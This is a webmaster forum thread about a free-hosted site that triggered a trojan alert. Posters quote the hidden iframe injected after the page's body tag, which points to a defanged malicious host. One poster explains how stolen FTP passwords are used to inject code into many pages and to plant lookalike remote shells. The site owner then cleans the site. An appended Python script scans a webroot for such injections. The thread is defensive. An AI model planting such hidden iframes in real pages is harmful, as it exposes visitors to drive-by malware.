#1 |
You can now put whatever you want in this space :)
|
Trojan on freesite
I was checking some freesites submitted to me - and this one made my trojan alerter go nuts: http://paintortures.com/16-06/
Take care |
#2 |
I'm a jaded evil bastard, I wouldn't piss on myself if I was on fire...
|
It is the main page that is the issue
Contains the following Code:
iframe src="http://meldor[inserted to kill link]group.cn:8080/ts/in.cgi?pepsi67" width=125 height=125 style="visibility: hidden"
slavesinlove.com/cgi-bin/click.cgi?id=dejavu
I know I've seen dejavu before...
__________________
I sale Internet My sites have no traffic and no PR - let's trade - PM me |
#3 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
iframe after <body> -- ftp account was most likely compromised.
__________________
SnapReplay.com a different way to share photos - iPhone & Android |
#4 |
I'm a jaded evil bastard, I wouldn't piss on myself if I was on fire...
|
Odd that it's not on all html pages... the index is clean... but the main page, the one that is less likely to get scanned by a linkbot has the code...
__________________
I sale Internet My sites have no traffic and no PR - let's trade - PM me |
#5 | |
I can now put whatever you want in this space :)
Join Date: Mar 2009
Location: Merica!
Posts: 543
|
Quote:
__________________
Its just a jump to the left. |
|
#6 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
There are a few types of exploits that are out there. A web exploit or an FTP exploit are the two most common.

With the FTP exploit, a person's FTP user/password data is compromised and passed off to a cluster of machines. Those machines then go in with the FTP credentials and download every .html and .php file and replace <body> with <body><script exploit code> or <body><iframe exploit code>. Within a few hours, that cluster of servers will have modified as many pages as they can. Other machines in there will try to determine actual usable URLs and will inject remote shells that mimic existing files. You might have DSC003049.jpg in a directory and the exploit server might inject DSC003049.php. Those URLs are then cataloged for later attempts at spam & DDOS work.

Most web exploits don't modify dozens of files and usually just inject a script that allows remote access. Usually it is modification of a template or file so that they can later run remote shells or scripts, or, depending on the hole in the application, they may upload files into directories for later use. Not to say that they couldn't modify a number of files, it depends on how the server is set up. If the host runs setuid or suexec, a compromised web script runs as the same userid as the FTP account and therefore all files can be modified. With FTP, you're almost guaranteed that every file you can see in FTP can be modified.

From a return on investment standpoint, with an FTP account you are more likely to have more pages modified. More pages means more surfers potentially exploited which means more zombies/toolbars/etc. However, the exploit listed above has about a 99% chance of being from an exploited FTP password.
__________________
SnapReplay.com a different way to share photos - iPhone & Android |
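A defender-side check for the two traces described in the post above, as an added example that is not part of the original thread: it walks a webroot, lists pages where `<body>` is followed directly by an iframe or script tag, and lists .php files that share a name with an image in the same directory. The function names, the extension lists and the sample tree (including the `example.invalid` URL) are constructed for illustration.

```python
import os
import re
import tempfile

PAGE_EXT = {".html", ".htm", ".php"}
MEDIA_EXT = {".jpg", ".jpeg", ".png", ".gif"}
# <body ...> followed directly (whitespace only) by an iframe or script tag.
BODY_INJECT = re.compile(rb"<body[^>]*>\s*<(iframe|script)\b", re.I)

def scan_webroot(root):
    """Return (injected_pages, lookalike_php) as sorted lists of relative paths."""
    injected, lookalike = [], []
    for dirpath, _dirs, files in os.walk(root):
        stems = {}  # lower-cased stem -> extensions seen in this directory
        for name in files:
            stem, ext = os.path.splitext(name)
            stems.setdefault(stem.lower(), set()).add(ext.lower())
        for name in files:
            stem, ext = os.path.splitext(name)
            ext = ext.lower()
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            if ext in PAGE_EXT:
                with open(os.path.join(dirpath, name), "rb") as fh:
                    if BODY_INJECT.search(fh.read()):
                        injected.append(rel)
            # A .php file sharing its name with an image (DSC003049.jpg / .php).
            if ext == ".php" and stems[stem.lower()] & MEDIA_EXT:
                lookalike.append(rel)
    return sorted(injected), sorted(lookalike)

def build_sample(root):
    """Constructed sample tree: one clean page, one modified page, one lookalike."""
    pages = {
        "index.html": "<html><body><h1>Gallery</h1></body></html>",
        "main.html": '<html><body><iframe src="http://example.invalid/x" '
                     'width=125 height=125 style="visibility: hidden"></iframe>'
                     "<h1>Main</h1></body></html>",
        "pics/DSC003049.jpg": "not a real image",
        "pics/DSC003049.php": "<?php /* placeholder */ ?>",
    }
    for rel, text in pages.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(scan_webroot(tmp))
```

Both lists are candidates for review, not verdicts: a page can legitimately open its body with a script tag, so compare each hit against a known-good copy before cleaning.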
#7 |
Internet! Is that thing still around?
Join Date: Aug 2008
Posts: 3
|
Hello 2all!
Thanks for the alert, this really is a trojan on my server! I have deleted it from this page and changed the FTP information... I will now find this code on the other pages too and clean it.
Thanks
#8 |
Internet! Is that thing still around?
Join Date: Aug 2008
Posts: 3
|
All fixed and iframes removed from the server.
Thanks again... |
#9 |
Live and learn. And take very careful notes!
|
Ah, so that was a trojan? My puter froze when I was checking your site on the main page, dejavu.. nothing further happened, the page froze, I could close it and go further without rebooting. Seems I finally have the right stuff to protect myself.